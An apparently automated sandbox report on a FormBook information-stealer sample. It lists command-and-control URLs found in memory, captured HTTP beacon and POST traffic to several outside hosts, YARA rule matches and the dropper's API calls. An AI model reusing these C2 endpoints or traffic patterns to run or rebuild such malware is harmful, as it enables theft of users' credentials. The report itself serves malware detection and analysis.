          Source: explorer.exe, 00000004.00000002.571954158.0000000005AC6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.450261230.0000000005AC3000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.germanreps.com/u2kb/www.germanreps.com
          Source: explorer.exe, 00000004.00000003.450261230.0000000005AC3000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.gritslab.com
          Source: explorer.exe, 00000004.00000002.571954158.0000000005AC6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.450261230.0000000005AC3000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.gritslab.com/u2kb/
          Source: explorer.exe, 00000004.00000002.571954158.0000000005AC6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.450261230.0000000005AC3000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.gritslab.com/u2kb/www.gritslab.com
          Source: explorer.exe, 00000004.00000003.450261230.0000000005AC3000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.mygloballojistik.online
          Source: explorer.exe, 00000004.00000002.571954158.0000000005AC6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.450261230.0000000005AC3000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.mygloballojistik.online/u2kb/
          Source: explorer.exe, 00000004.00000002.571954158.0000000005AC6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.450261230.0000000005AC3000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.mygloballojistik.online/u2kb/www.mygloballojistik.online
          Source: explorer.exe, 00000004.00000003.450261230.0000000005AC3000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.shapshit.xyz
          Source: explorer.exe, 00000004.00000002.571954158.0000000005AC6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.450261230.0000000005AC3000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.shapshit.xyz/u2kb/
          Source: explorer.exe, 00000004.00000002.571954158.0000000005AC6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.450261230.0000000005AC3000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.shapshit.xyz/u2kb/www.shapshit.xyz
          Source: explorer.exe, 00000004.00000003.450261230.0000000005AC3000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.thedivinerudraksha.com
          Source: explorer.exe, 00000004.00000002.571954158.0000000005AC6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.450261230.0000000005AC3000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.thedivinerudraksha.com/u2kb/
          Source: explorer.exe, 00000004.00000002.571954158.0000000005AC6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.450261230.0000000005AC3000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.thedivinerudraksha.com/u2kb/www.thedivinerudraksha.com
          Source: explorer.exe, 00000004.00000003.450261230.0000000005AC3000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.thewildphotographer.co.uk
          Source: explorer.exe, 00000004.00000002.571954158.0000000005AC6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.450261230.0000000005AC3000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.thewildphotographer.co.uk/u2kb/
          Source: explorer.exe, 00000004.00000002.571954158.0000000005AC6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.450261230.0000000005AC3000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.thewildphotographer.co.uk/u2kb/www.thewildphotographer.co.uk
          Source: explorer.exe, 00000004.00000003.450261230.0000000005AC3000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.un-object.com
          Source: explorer.exe, 00000004.00000002.571954158.0000000005AC6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.576758060.000000000C94E000.00000040.80000000.00040000.00000000.sdmp, explorer.exe, 00000004.00000003.450261230.0000000005AC3000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.un-object.com/u2kb/
          Source: explorer.exe, 00000004.00000002.571954158.0000000005AC6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.450261230.0000000005AC3000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.un-object.com/u2kb/www.un-object.com
          Source: explorer.exe, 00000004.00000003.450261230.0000000005AC3000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.white-hat.uk
          Source: explorer.exe, 00000004.00000002.571954158.0000000005AC6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.450261230.0000000005AC3000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.white-hat.uk/u2kb/
          Source: explorer.exe, 00000004.00000002.571954158.0000000005AC6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.450261230.0000000005AC3000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.white-hat.uk/u2kb/www.white-hat.uk
          Source: explorer.exe, 00000004.00000003.450261230.0000000005AC3000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.younrock.com
          Source: explorer.exe, 00000004.00000002.571954158.0000000005AC6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.450261230.0000000005AC3000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.younrock.com/u2kb/
          Source: cmd.exe, 00000005.00000002.569647158.0000000005FE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.younrock.com/u2kb/?ch=1&js=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhdWQiOiJKb2tlbiIsImV4c
          Source: explorer.exe, 00000004.00000002.571954158.0000000005AC6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.450261230.0000000005AC3000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.younrock.com/u2kb/www.younrock.com
          Source: HI4NJ046K.5.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
          Source: explorer.exe, 00000004.00000002.580448726.000000001525E000.00000004.80000000.00040000.00000000.sdmp, cmd.exe, 00000005.00000002.569051526.000000000444E000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://alldomains.hosting/
          Source: explorer.exe, 00000004.00000002.580448726.000000001525E000.00000004.80000000.00040000.00000000.sdmp, cmd.exe, 00000005.00000002.569051526.000000000444E000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://alldomains.hosting/domain-registrieren.html
          Source: explorer.exe, 00000004.00000002.580448726.000000001525E000.00000004.80000000.00040000.00000000.sdmp, cmd.exe, 00000005.00000002.569051526.000000000444E000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://alldomains.hosting/e-mail-server.html
          Source: cmd.exe, 00000005.00000002.569051526.000000000444E000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://alldomains.hosting/hosting-webhosting.html
          Source: HI4NJ046K.5.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
          Source: HI4NJ046K.5.drString found in binary or memory: https://duckduckgo.com/ac/?q=
          Source: cmd.exe, 00000005.00000003.393433818.000000000320B000.00000004.00000020.00020000.00000000.sdmp, HI4NJ046K.5.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
          Source: HI4NJ046K.5.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
          Source: cmd.exe, 00000005.00000003.393433818.000000000320B000.00000004.00000020.00020000.00000000.sdmp, HI4NJ046K.5.drString found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
          Source: cmd.exe, 00000005.00000003.393433818.000000000320B000.00000004.00000020.00020000.00000000.sdmp, HI4NJ046K.5.drString found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas_sfp&command=
          Source: cmd.exe, 00000005.00000003.393433818.000000000320B000.00000004.00000020.00020000.00000000.sdmp, HI4NJ046K.5.drString found in binary or memory: https://search.yahoo.com?fr=crmas_sfp
          Source: cmd.exe, 00000005.00000003.393433818.000000000320B000.00000004.00000020.00020000.00000000.sdmp, HI4NJ046K.5.drString found in binary or memory: https://search.yahoo.com?fr=crmas_sfpf
          Source: cmd.exe, 00000005.00000003.393433818.000000000320B000.00000004.00000020.00020000.00000000.sdmp, HI4NJ046K.5.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
          Source: explorer.exe, 00000004.00000002.580448726.00000000150CC000.00000004.80000000.00040000.00000000.sdmp, cmd.exe, 00000005.00000002.569051526.00000000042BC000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.name.com/domain/rene
          Source: cmd.exe, 00000005.00000002.569647158.0000000005FE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.name.com/domain/renew/222ambking.org?utm_source=Sedo_parked_page&utm_medium=button&utm_c
          Source: cmd.exe, 00000005.00000002.569647158.0000000005FE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.sedo.com/services/parking.php3
          Source: unknownHTTP traffic detected: POST /u2kb/ HTTP/1.1Host: www.gritslab.comConnection: closeContent-Length: 184Cache-Control: no-cacheOrigin: http://www.gritslab.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.gritslab.com/u2kb/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 73 37 3d 28 66 71 54 47 58 66 5f 6b 4e 50 63 28 71 42 41 48 34 79 65 65 47 71 37 51 76 76 30 28 4b 48 6e 55 46 49 79 6f 36 46 44 47 79 4f 78 31 52 43 64 68 42 69 47 5a 54 69 70 36 4d 43 78 41 63 47 79 67 38 32 47 4b 76 51 30 79 71 62 56 46 4d 4f 67 5a 46 52 4d 6a 4a 7e 30 73 66 28 38 7a 79 58 7a 66 6e 39 50 4a 59 77 36 54 47 71 44 36 43 4e 68 44 53 6d 4f 36 4a 42 39 58 68 68 45 7a 70 39 37 45 71 79 67 43 70 6c 45 44 6a 74 62 50 61 61 41 41 54 74 76 34 66 34 75 37 70 38 65 72 6f 7a 68 30 45 50 6d 71 51 64 56 7e 6e 34 49 4a 41 62 6a 6e 67 29 2e 00 00 00 00 00 00 00 00 Data Ascii: s7=(fqTGXf_kNPc(qBAH4yeeGq7Qvv0(KHnUFIyo6FDGyOx1RCdhBiGZTip6MCxAcGyg82GKvQ0yqbVFMOgZFRMjJ~0sf(8zyXzfn9PJYw6TGqD6CNhDSmO6JB9XhhEzp97EqygCplEDjtbPaaAATtv4f4u7p8erozh0EPmqQdV~n4IJAbjng).
          Source: unknownDNS traffic detected: queries for: www.white-hat.uk
          Source: global trafficHTTP traffic detected: GET /u2kb/?pJ=y0bMVGhK3R&s7=PXfMycAZpTAipct8YsIgv6PR3Y11yPgF2k7967nf/qU1A0mUqq9Jy2mfr4kURdfD0IyZUuXLnrTzZCke5/3tklxZoaLCmex8cw== HTTP/1.1Host: www.white-hat.ukConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /u2kb/?s7=ydCzFiH7iMWnz6xHMre3IWaEcfnK5+fYQUsmgPEoYCSsyD6HgT3yZXCBsea1O+OKnOGwPNRrrKn2ANadQmZjx8zjtO3/lmb0Gg==&pJ=y0bMVGhK3R HTTP/1.1Host: www.gritslab.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /u2kb/?pJ=y0bMVGhK3R&s7=rr+sOBvEXsBdGevUkZEAvniGWrNxzC1YNHmXivr92FQhRIIYsedRhL+YGaN2VCieGtjtLTUTzUqxDX3Wf7Wl2JIBHu0WW9vDmQ== HTTP/1.1Host: www.bitservicesltd.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /u2kb/?s7=IEUpLmGg2fqLmrhwDd0CH8vm0i8ubOQDFcodV2ACJcW4bHSQscR3aN4MRDv2q1O0g2vnwuasF99orDvyVUesQZcBXW4MNpIrrg==&pJ=y0bMVGhK3R HTTP/1.1Host: www.222ambking.orgConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /u2kb/?pJ=y0bMVGhK3R&s7=IK59b/MdFRha+CUVMWpzDpHQ2riuD6F66TLC1fPPNwLnZq29gpb12AWvlZbo17UEh0sBgFvevrMQsuZfYKuNRicmmGgsJT37Uw== HTTP/1.1Host: www.energyservicestation.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /u2kb/?s7=05tPwqSdqXO2xf32BHQi8E1nUfoFa2c80hhB3sQ3FFDNPs5AZDU6EjUymll22Wm6Scj5xbzg3GdXyuHgSKq8rTPQW1vWIa2Wug==&pJ=y0bMVGhK3R HTTP/1.1Host: www.younrock.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /u2kb/?pJ=y0bMVGhK3R&s7=pn+zaWXo7szcfRSxpZYFMSllMpP2ulP+x3705F5u21IqvN9WG9kcUa2nxvPm1UX5MTo8dUhpuHauDgBRPTa7tLWBUGjKVRCVBQ== HTTP/1.1Host: www.thewildphotographer.co.ukConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /u2kb/?s7=Yd5Rzn4EVOpL1Cl/e5Amzdaa+E7UlYBpl8BtE0ZhlgLGbR5cH1Fns9iDSFPM0EqDoX1il4mP+EMsdt2zebBtiTAOJDfFAse6Fg==&pJ=y0bMVGhK3R HTTP/1.1Host: www.shapshit.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /u2kb/?pJ=y0bMVGhK3R&s7=im5SXjRwbJIZeY2yeMVWNNnKg99Etck2UhYi2fNZ2Kf/X7lq2SPR1Q6pROq8Gck3yLtOH/fXnE++yuD9U7pi0eI0K5lBX7KNLg== HTTP/1.1Host: www.thedivinerudraksha.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /u2kb/?pJ=y0bMVGhK3R&s7=pRDkJdNDOVoQCU+9NHQShuJ8RlIM2fjCZpxzdvjpnmqfDHzh6n+FGyromdVZx0/+Z3ctR0ZwX+ep4hJ0NBR+2QmcJmTx4hb/kQ== HTTP/1.1Host: www.un-object.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Garf.Gen.6.31593.18898.exeCode function: 0_2_00405809 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,

          E-Banking Fraud

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 3.2.vfpbkeeo.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.vfpbkeeo.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000005.00000002.567150912.0000000000D10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.352371790.00000000008C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.352064891.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.352209935.0000000000430000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.567279277.0000000000D50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.567056934.0000000000C20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

          System Summary

          barindex
          Malicious sample detected (through community Yara rule)
          Source: 3.2.vfpbkeeo.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 3.2.vfpbkeeo.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.2.vfpbkeeo.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 3.2.vfpbkeeo.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.567150912.0000000000D10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000005.00000002.567150912.0000000000D10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.352371790.00000000008C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000003.00000002.352371790.00000000008C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.352064891.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000003.00000002.352064891.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.352209935.0000000000430000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000003.00000002.352209935.0000000000430000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.567279277.0000000000D50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000005.00000002.567279277.0000000000D50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.567056934.0000000000C20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000005.00000002.567056934.0000000000C20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: SecuriteInfo.com.Trojan.Garf.Gen.6.31593.18898.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
          Source: 3.2.vfpbkeeo.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 3.2.vfpbkeeo.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 3.2.vfpbkeeo.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 3.2.vfpbkeeo.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.567150912.0000000000D10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000005.00000002.567150912.0000000000D10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.352371790.00000000008C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000003.00000002.352371790.00000000008C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.352064891.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000003.00000002.352064891.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.352209935.0000000000430000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000003.00000002.352209935.0000000000430000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.567279277.0000000000D50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000005.00000002.567279277.0000000000D50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.567056934.0000000000C20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000005.00000002.567056934.0000000000C20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Garf.Gen.6.31593.18898.exeCode function: 0_2_00403640 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,ExitProcess,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Garf.Gen.6.31593.18898.exeCode function: 0_2_00406D5F
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 1_2_00410331
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 1_2_00A408B7
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 1_2_00A40A3B
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_0040C043
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_00405873
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_00401824
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_00401830
          Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exeCode function: 3_2_0040C03E
